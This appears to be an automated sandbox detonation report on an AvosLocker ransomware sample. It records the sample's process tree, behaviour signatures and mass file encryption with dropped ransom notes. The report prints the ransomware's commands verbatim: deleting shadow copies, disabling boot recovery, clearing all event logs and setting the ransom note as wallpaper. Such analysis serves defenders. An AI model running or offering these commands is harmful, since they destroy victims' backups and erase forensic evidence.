PID 2740 wrote to memory of 1556 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2760 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2760 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2760 wrote to memory of 2920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 2776 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2776 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2776 wrote to memory of 1296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2756 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2756 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2756 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3028 wrote to memory of 6012 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3028 wrote to memory of 6012 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3028 wrote to memory of 6012 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3028 wrote to memory of 6012 N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6012 wrote to memory of 5560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 6012 wrote to memory of 5560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 6012 wrote to memory of 5560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 6012 wrote to memory of 5924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 6012 wrote to memory of 5924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 6012 wrote to memory of 5924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\247783023.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 e88368c43d7de561cfbedc2b648244da
SHA1 44ec9116dd8dfe89df6549f96ec18dccef15cd20
SHA256 6ab96b28dc9bc5dd0130e8eee1a8810b87b60feeff054a6a8fa509110aaaa881
SHA512 e123f63bd0ff2507634c16832d71e3be6f9e52b39df4b1bd3003035f68c1c4c5692cf3cd566cfca4247569e7fe8da0c40aea2f78b9a7797def8de8b0eeef28fd

memory/1592-1208-0x00000000021A0000-0x00000000021A8000-memory.dmp

memory/1592-1196-0x000000001B6B0000-0x000000001B992000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a65aed315425671eea1a56e72ad8b03
SHA1 b51e4268f35b7eec4a29744047cc618af0cd4614
SHA256 f11364f50429da1c0d63e9d1b138998d73780a81c1b8ac4a62177a21ae9f5ea6
SHA512 e6bdade527f3e9ed8508ee636b537e6f7eedeb3aa2aac073eee57e611083ee1973708b2b56ef7978b90bb6e22947be56c299a59bafdcd124a8f9b0f7dccb5347

memory/6012-24554-0x000000001B670000-0x000000001B952000-memory.dmp

memory/6012-24555-0x00000000021E0000-0x00000000021E8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-23 08:14

Reported

2024-09-23 08:16

Platform

win10v2004-20240802-en

Max time kernel

92s

Max time network

93s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8471) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\526292617.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-400.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfigOnLogon.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_100_percent.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\acrobat_pdf.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\UnregisterProtect.nfo C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYHBD.TTC C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hu.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCacheMini.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\README.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.INF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\fa.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\outlook_whatsnew.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\ado\ja-JP\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\MutableBackup\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\System\ado\fr-FR\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Windows Defender\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\es-ES.mail.config C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\1949_20x20x32.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\gu\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
